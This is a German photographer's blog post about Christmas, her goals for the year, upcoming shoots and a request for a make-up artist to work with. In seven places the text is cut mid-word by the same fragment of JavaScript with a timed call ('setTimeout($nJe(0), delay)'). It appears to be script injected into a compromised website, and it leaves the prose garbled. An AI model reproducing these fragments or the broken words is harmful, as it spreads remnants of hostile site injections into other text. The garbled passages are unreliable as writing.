Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Es geht in den Endspurt – Plätzchen, warme Decken & ganz viel Tee ♥

Hallo meine Lieben,

ich hinke mit meinen letzten Posts etwas hinterher. In letzter Zeit sind einige Umstrukturierungsmaßnahmen im Gange und ich kann es immer noch nicht glauben, aber Weihnachten steht tatsächlich vor der Tür. Ich glaube, ich habe es noch nicht realisiert, dass bereits Mitte November ist.  Jetzt macht man sich langsam wieder Gedanken was man Schönes & Brauchbares verschenken kann, die Plätzchensession ist eröffnet und wer mich kennt, der weiß, ich liebe Plätzchen über alles… Also lang wird es nicht mehr dauern und dann stehe ich wieder in der Küche und backe für meine Lieben!  Jetzt geht es auch fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografisch in den Endspurt. Die letzten Shootings sind gebucht. Und ich freue mich auf jedes Einzelne sehr. Man glaubt nicht wie sehr es einen freut, wenn man positives Feedback erhält. Es spornt so sehr an und dafür danke ich. Nicht nur ich habe dieses Jahr viel Wundervolles geschaffen auch ein großes Lob muss an meine Modelle gehen. An den Personen vor der Kamera, die für Neues offen waren und eine Menge positiver Energie zum Shooting brachten. So soll es weiter gehen☺

An was ich gerade arbeite? Ich habe mir ein leeres Buch gekauft, in dem ich in Zukunft versuchen werde, Erfolge sowie meine weiteren Ziele aufzuschreiben. Ein ganz großes Ziel von mir: 500 Fans in Facebook. (Also falls meine Arbeiten gefallen, bitte schaut, dass ihr den FB-Butdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton auf gefällt mir gedrückt habt ☺) Auch werde ich versuchen diese Liste aktuell zu halten, um zu sehen, wie ich voran komme. Ob realistische Ziele oder nicht, das spielt in erster Linie keine Rolle. Ich glaube an die Kraft und das Positive. Was für Erfolge könnt ihr in diesem Jahr feiern?

Es ist wundervoll zu sehen, wie schnell sich Dinge ändern & wie man lernt mit neuen Situationen umzugehen. Aber fürs Erste fange ich mit einer To-Do Liste an. In den kommenden Wochen werde ich mir auch mit Plätzchen, eingehüllt in einer Decke und mit ganz viel Tee die Zeit nehmen und mir über meine nächsten Projekte Gedanken machen. Das kommende Jahr soll prall gefüllt werden mit Shootings aller Art & auch auf weitere Buchungen im Bereich Hochzeit & Repotagen freue ich mich sehr ♥ Ahhh ich habe vor einiger Zeit mal in der Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokiste meiner Eltern gekramt und das unten gezeigte Familienfodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, ließ mein Blick nicht mehr los. Und heute viel es mir zufällig wieder in die Hände… Ich kann nur sagen, dass ich dieses Bild liebe und froh bin so eine dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolle Familie um mich zu haben ♥ Die Weihnachtszeit ist dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toll, man besinnt sich wieder auf das Wesentliche. Familienfeste werden die kommenden Wochen meinen Terminkalender füllen und ich freue mich darauf schon sehr.

Ein kleiner Aufruf: ich suche eine Visagisten (/in) für eine längere Zusammenarbeit. Es kommt immer wieder die Frage bzgl. Visagistin und ich würde gerne meinen zukünftigen Kunden diesen Service anbieten. Sie sollen sich atemberaubend schön fühlen. Falls eine Visagistin Interesse an einer Zusammenarbeit mit mir hat, soll sie sich bitte nicht scheuen und mich kontaktieren. Ich würde mich wahnsinnig freuen.

Und das Beste zum Schluß: Morgen werden wieder etwas mehr Bilder und weniger Text folgen. Die Hochzeit einer guten Freundin, von der auch der wunderschöne Blumenstrauß auf den unten gezeigten Fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos ist. Ich freue mich sehr, diese Serie zeigen zu dürfen und danke ihr nochmal herzlich für die Überraschung ♥

 

Keine Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

Menu